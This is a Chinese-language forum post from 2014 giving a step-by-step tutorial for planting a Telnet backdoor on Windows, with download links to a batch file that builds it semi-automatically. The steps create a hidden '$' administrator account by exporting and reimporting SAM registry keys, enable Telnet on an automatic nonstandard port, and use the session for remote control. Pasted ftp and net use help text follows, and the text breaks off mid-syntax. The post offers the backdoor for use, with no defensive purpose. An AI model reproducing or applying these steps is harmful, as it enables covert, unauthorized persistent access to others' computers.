日期:2014-05-17  浏览次数:20932 次

【原创】Telnet后门制作,附带 IIS 的组件文件,和 半自动生成Telnet后门 的批处理
半自动生成Telnet后门.rar(解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/attachment.php?aid=MjE5MDN8MWMzYWU4ZTB8MTI2MDU5MDA1N3wxOWI1TmhoYW5NNUxDb3JsS014K2xHdjJOWno0Q250NmRoMDB2SUZCblYwdXc3Zw%3D%3D
组件文件.rar (解压密码是:dianyancao@126.com)
http://www.nohack.cn/bbs/viewthread.php?tid=111695&extra=
首先新建一个隐藏用户 $
具体操作:
新建用户 $ ,设置属性(用户不能更改密码)(密码永不到期)
并且为该用户设置较长的密码
打开用户 $ 的 属性的隶属于项
接着删除其中的Users组
并且把用户 $ 加入 Administrators组
在注册表中把 HKEY_LOCAL_MACHINE\SAM\SAM项的权限设置为
允许Administrators组完全控制,然后刷新该项
进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$ 
找到用户 $ 的 默认值类型,记住该类型(0x???),并导出 $ 项为 "用户标识符.reg"
再进入项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 之中
寻找和上面的类型相匹配的项,并将其导出为 "用户信息.reg"
最后在计算机用户管理中,删除用户 $ ,并导入上述两个注册表文件
再将用户 $ 加入 TelnetClients用户组
在计算机用户组管理中新建 TelnetClients 组
然后将用户 $ 添加成为 TelnetClients用户组 的成员


配置Telnet服务
在计算机服务管理中,启用Telnet服务,并将其 启动类型 设置为 自动
运行cmd.exe,开始命令行操作,输入命令:
tlntadmn config port= ???? &echo “????”是小于1024的正整数


测试Telnet服务
开始命令行操作,输入命令:
telnet 127.0.0.1 ???? &echo “????”是上面设置的Telnet服务端口
由于测试的是本机的Telnet,所以输入上述命令后有显示:
您将要把您的密码信息送到 Internet 区内的一台远程计算机上。这可能不安全。您还要送
吗(y/n):n
选择N,然后显示
Welcome to Microsoft Telnet Service

login: $
password:
输入用户名和密码,确定
若出现欢迎信息:Welcome to Microsoft Telnet Server.
那么就可以在网络上,用用户 $ 和密码,远程登录该计算机了。


使用Telnet进行远程控制
远程登录计算机控制台后,就可以用命令行操作运行程序了,使用方法和本地cmd相同。
推荐本地使用的命令:
ftp -? &echo 使用ftp命令需要远程系统添加Windows组件,即Internet 信息服务(IIS)

Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

-v Suppresses display of remote server responses.
-n Suppresses auto-login upon initial connection.
-i Turns off interactive prompting during multiple file
transfers.
-d Enables debugging.
-g Disables filename globbing (see GLOB command).
-s:filename Specifies a text file containing FTP commands; the
commands will automatically run after FTP starts.
-a Use any local interface when binding data connection.
-A login as anonymous.
-w:buffersize Overrides the default transfer buffer size of 4096.
host Specifies the host name or IP address of the remote
host to connect to.

Notes:
- mget and mput commands take y/n/q for yes/no/quit.
- Use Control-C to abort commands.

ftp -a 127.0.0.1
ftp> help
Commands may be abbreviated. Commands are:

! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

C:\>net use /?
此命令的语法是:


NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[/USER:[dotted domain name\]username]
[/USER:[username@dotted domain name]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
<